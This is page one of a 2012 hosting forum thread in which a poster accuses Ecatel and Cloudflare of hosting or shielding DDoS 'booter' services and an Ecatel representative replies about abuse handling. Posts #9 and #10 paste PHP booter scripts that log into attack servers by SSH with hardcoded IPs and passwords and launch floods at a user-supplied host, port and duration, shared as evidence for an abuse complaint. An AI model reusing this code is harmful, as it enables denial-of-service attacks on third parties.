Results 1 to 25 of 267
-
08-14-2012, 09:56 AM #1Junior Guru Wannabe
- Join Date
- Aug 2012
- Posts
- 96
Cloudflare and Ecatel working together to help Cyber crimals
Hello All,
I am here to inform you all of Ecatel's and Cloudflare's relationship.
Ecatel want proof of there clients doing anything illegal?
Well isn't hosting a PHP Hub to send DDoS attacks , Illegal?
Cloudflare say 'no attack traffic comes through out network' Yes in my report i didn't saying anything about traffic coming through your network.
Picture of the section - Hackforums has a section dedicated to booters.
The attack servers are mainly with Ecatel.
They will deny it on here , but they know its true.
They allow people to have a paid box with them I mean they allow spoofed attack outbound so they don't even get reports about the attacks so they don't care.
List of booters :
http://elitestresser.com/index.php - A Records ,173.245.60.51, 173.245.60.135
Cloudflare ^
http://absoboot.com - A Records 108.162.199.99, 108.162.194.198
Cloudflare ^
http://quantumbooter.net - A Records ns1.xsltel.com, ns2.xsltel.com, ns3.xsltel.com, ns4.xsltel.com - 80.82.69.148
Ecatel ^
List goes on.
I come here to post the truth because I want something done about these illegal tools on the internet.
They wont listen to my abuse reports so I'll go public with it.0
-
08-14-2012, 11:15 AM #2Junior Guru
- Join Date
- Dec 2002
- Location
- Bulgaria
- Posts
- 186
You are posting a well-known fact. I am not sure what you expect to happen. I am sure that it is absolutely clear to everyone that this thread would not change anything. There are hundreds of others just like it. Cloudflare - in reality did nto do absolutely nothing, as the traffic indeed does not go though their servers. Ecatel will come and deny it and never would get an abuse report just because after reflection UDP DDoS it is next to impossible to track the initial server. Hackforums on the other side claim that they allow advertisement of legla tools for stress testing of own servers.
My point - just another thread that will die out in a day as noone from here could do anything about it. Ecatel are already well-known for hosting all kinds of **** on their network.0
-
08-14-2012, 11:20 AM #3Web Hosting Master
- Join Date
- Apr 2010
- Location
- Canada
- Posts
- 1,770
Maxence H. - UBservers.com
Specialists in high-performance hosting since 2008!
Outstanding 24x7 support - Canada, USA, France
★ SSD VPS ★ Dedicated Servers ★ SSD Web Hosting ★0
-
08-14-2012, 11:22 AM #4Divided by Zero
- Join Date
- Jun 2009
- Posts
- 1,219
http://www.secanalyst.org/2011/08/23...anding-ecatel/
Just one of a few sources that relate Ecatel to the notorious Russian Business Network.Last edited by Amitz; 08-14-2012 at 11:26 AM.
0
-
08-14-2012, 11:30 AM #5Web Hosting Evangelist
- Join Date
- Jun 2006
- Location
- Amsterdam
- Posts
- 499
Anyone can sent a report to abuse@ecatel.net (24/7 staffed e-mail). In case of activities which are not allowed by the Dutch laws we will act almost immediately. Please do not forget to sent proof and logfiles, we need these to take necessary steps.
@amitz, ecatel is not part of the RBN network. We are a dutch ISP providing hosting services since 2004. That's all.
Report your problem at abuse@ecatel.net first and sent some proof with information, i am sure they will help you in that case.
thanks.0
-
08-14-2012, 11:37 AM #6Junior Guru Wannabe
- Join Date
- Aug 2012
- Posts
- 96
What proof do you want?
You said after I emailed you 'proof' of client doing something illegal?
Well
Go to the website the word 'booter' isn't enough for you to smell the ****ing coffee?
I mean I can go ahead and release a bunch of booter sources I have from providers that have given them to me after reports with the SSH2 PHP code with YOUR IP's still there.
Would that be enough?
Are you going to stop these illegal activity going out of your network?
Stop the spoofing ecatel!0
-
08-14-2012, 11:39 AM #7Divided by Zero
- Join Date
- Jun 2009
- Posts
- 1,219
@ecatel: I am not so careless to say that you are part of the RBN. I just say that there are quite a lot of others that claim this. And to be honest: You know that you are not just a dutch ISP. Your network is one of the worst in terms of spam, botnets and illegal activities. That reputation is your main selling point.
0
-
08-14-2012, 11:41 AM #8Junior Guru
- Join Date
- Dec 2002
- Location
- Bulgaria
- Posts
- 186
And you just confirmed what I wrote down.
Please explain how do you expect to get logs from a spoofed reflection attack, initiated from one of your servers?
And also the majority, probably 98% of the other providers do not allow spoofing from their network, you still do, which I find majorly shady.
I get tens of tickets about "Hey, this guy from HFs attacked me" and I literally can not do anything about it, no matter I know where the original server came from, other than just watching how my network pipe gets filled unless I blackhole the IP.
Anyway, I have already been in this duscussion many, many times this year. I am out.
Gratz0
-
08-14-2012, 11:43 AM #9Junior Guru Wannabe
- Join Date
- Aug 2012
- Posts
- 96
<?php
include('Net/SSH2.php');
define('NET_SSH2_LOGGING', true);
$ip = array("94.102.52.144","89.248.160.192","93.174.93.239");
$ip = $ip[rand(0, count($ip) - 1)];
$user = "flooder";
$pass = "FloodYourMother";
$command = "clientflooder {$_GET["host"]} {$_GET["port"]} GMSA {$_GET["time"]} 100";
$ssh = new Net_SSH2($ip);
if (!$ssh->login($user, $pass)) {
exit('Login Failed');
}
echo $ssh->exec($command);
?>
Password's have since been changed but still..0
-
08-14-2012, 11:45 AM #10Junior Guru Wannabe
- Join Date
- Aug 2012
- Posts
- 96
<?php
include('Net/SSH2.php');
define('NET_SSH2_LOGGING', NET_SSH2_LOG_COMPLEX);
$ip = array("89.248.160.213","89.248.172.240","80.82.64.71");
$ip = $ip[rand(0, count($ip) - 1)];
$user = "root";
$pass = "k1a2j397";
$command = "./ssyn {$_GET["host"]} {$_GET["port"]} {$_GET["time"]}";
$ssh = new Net_SSH2($ip);
if (!$ssh->login($user, $pass)) {
exit('Login Failed');
}
echo $ssh->exec($command);
?>
These ones still work I believe gonna suspend them ecatel or Just offer the client a new IP?
Password's don't work but the IPs are still alive , currently there will be no outgoing floods as the crimal's site is offline due to an abuse report. you see ecatel other provider act upon abuse something you don't.Last edited by Eccie; 08-14-2012 at 11:48 AM. Reason: Update.
0
-
08-14-2012, 11:54 AM #11Web Hosting Master
- Join Date
- Jun 2011
- Location
- Internet
- Posts
- 2,985
0
-
08-14-2012, 11:56 AM #12Junior Guru Wannabe
- Join Date
- Aug 2012
- Posts
- 96
0
-
08-14-2012, 11:57 AM #13Web Hosting Evangelist
- Join Date
- Jun 2006
- Location
- Amsterdam
- Posts
- 499
We monitor our customers network ports, when a customer server is hacked and sending a ddos attack we see high different in traffic. Or peaks with a straight line. In that case we act ourself if there is no report and suspend the customers server.
If you receive a ddos attack from someone that doesnt mean it comes from us. There are many other providers out there aswell. If you think someone is sending a ddos out of our network you can always e-mail and we sflow customers traffic for confirmation. If it appears you are right we shutdown the customer.0
-
08-14-2012, 12:00 PM #14Web Hosting Guru
- Join Date
- Feb 2012
- Posts
- 276
I don't believe you.
You see the booter on your network in the OP
What are you going to do to that?
XSLTel is a criminal .
Remove them from your network.
They have a lot of illegal things on your network.
There was a thread on here a few weeks ago about him being in an hacking clan and using your network to send flood.
I believe his servers were all suspended at one point due to sending 10gbit of flood.
That's what I was informed.Last edited by JackS00; 08-14-2012 at 12:09 PM. Reason: Spelling mistake.
0
-
08-14-2012, 12:00 PM #15Web Hosting Evangelist
- Join Date
- Jun 2006
- Location
- Amsterdam
- Posts
- 499
Many people who do not know what they are talking about say we host spam, botnets, malware etc. Like you, posting a link of 2011 which doesnt make any sense. The writer of that article is talking pure nonsense. Do you know any malware websites? message them to me and we shut them down. We have a VERY tight policy against spam and malware for years. Many of our customers can confirm we are VERY difficult if it appears our customer is hosting spam or malware. Also see:
http://noc.ecatel.net/ecatel-abuse.html0
-
08-14-2012, 12:01 PM #16Web Hosting Master
- Join Date
- Jun 2011
- Location
- Internet
- Posts
- 2,985
0
-
08-14-2012, 12:02 PM #17Web Hosting Evangelist
- Join Date
- Jun 2006
- Location
- Amsterdam
- Posts
- 499
We dont remove someone because of their reputation. Some people informed us about this thread you mention. I can assure you they *did not* use our network for any attacks. If this was happened we had already shutdown the servers!
And also You as an old customer from us know we are against criminal activities. We have a very active abusedesk.0
-
08-14-2012, 12:03 PM #18Web Hosting Guru
- Join Date
- Feb 2012
- Posts
- 276
0
-
08-14-2012, 12:04 PM #19Web Hosting Evangelist
- Join Date
- Jun 2006
- Location
- Amsterdam
- Posts
- 499
Hello,
Have you already contacted our abusedesk? It is possible the customer is using this servers indeed for criminal activities or the servers of our customer are hacked and abused for ddos attacks. I will forward it to abuse and will ask them for the status on this case.0
-
08-14-2012, 12:06 PM #20Web Hosting Evangelist
- Join Date
- Jun 2006
- Location
- Amsterdam
- Posts
- 499
We dont allow that. But to act against a report we need proof the servers are indeed used for criminal activities. If a domain is hosted on a ip this can be a shared server (hosting multiple domains) or a VPS account. We always first give our customers the oppertunity to take action against the matter theirself before we start nullrouting ips.
0
-
08-14-2012, 12:07 PM #21Junior Guru Wannabe
- Join Date
- Aug 2012
- Posts
- 96
0
-
08-14-2012, 12:08 PM #22Junior Guru Wannabe
- Join Date
- Aug 2012
- Posts
- 96
0
-
08-14-2012, 12:12 PM #23Junior Guru Wannabe
- Join Date
- Aug 2012
- Posts
- 96
I feel much better now that Ecatel have heard what I have to say.
Now I need to hear from Cloudflare.0
-
08-14-2012, 12:13 PM #24Web Hosting Evangelist
- Join Date
- Jun 2006
- Location
- Amsterdam
- Posts
- 499
@ eccie, we checked your report!
89.248.160.213 = was already terminated few days ago by our abuse dept..
89.248.172.240 = VPS server from one of our customers, we indeed see peaks to 500 mbit. We have contacted our customer and ratelimited the server to 100 mbit.
80.82.64.71= We also see peaks to 500 mbit on this servger. Also a VPs server located on a node of one of our resellers, server has been ratelimited to 100 mbit temporary and customer was contacted.
I can confirm you all three ips mentioned here are *not* owned or have anything to do with xsltel at all.0
-
08-14-2012, 12:23 PM #25Junior Guru Wannabe
- Join Date
- Aug 2012
- Posts
- 96
0
Similar Threads
-
CLOUDFLARE.COM supporting cyber crime terrorists (credit card fraud)
By mybestfriend in forum Hosting Security and TechnologyReplies: 15Last Post: 05-25-2012, 03:38 AM -
eCloud Hosting Cyber WEEK Blowout | Cyber Monday is now Cyber Week | HUGE SAVINGS!
By Dedispec in forum Dedicated Hosting OffersReplies: 0Last Post: 11-30-2010, 04:46 AM -
non-working forwarding email account on working domain
By marcnyc in forum Web HostingReplies: 9Last Post: 04-28-2008, 11:30 PM -
need working apache + suexec + frontpage working patch
By ssrsunil in forum Web HostingReplies: 4Last Post: 09-10-2005, 04:23 PM -
FormMail CGI's stoped working - POST not working?!?
By jucebro in forum Dedicated ServerReplies: 14Last Post: 12-04-2001, 09:42 PM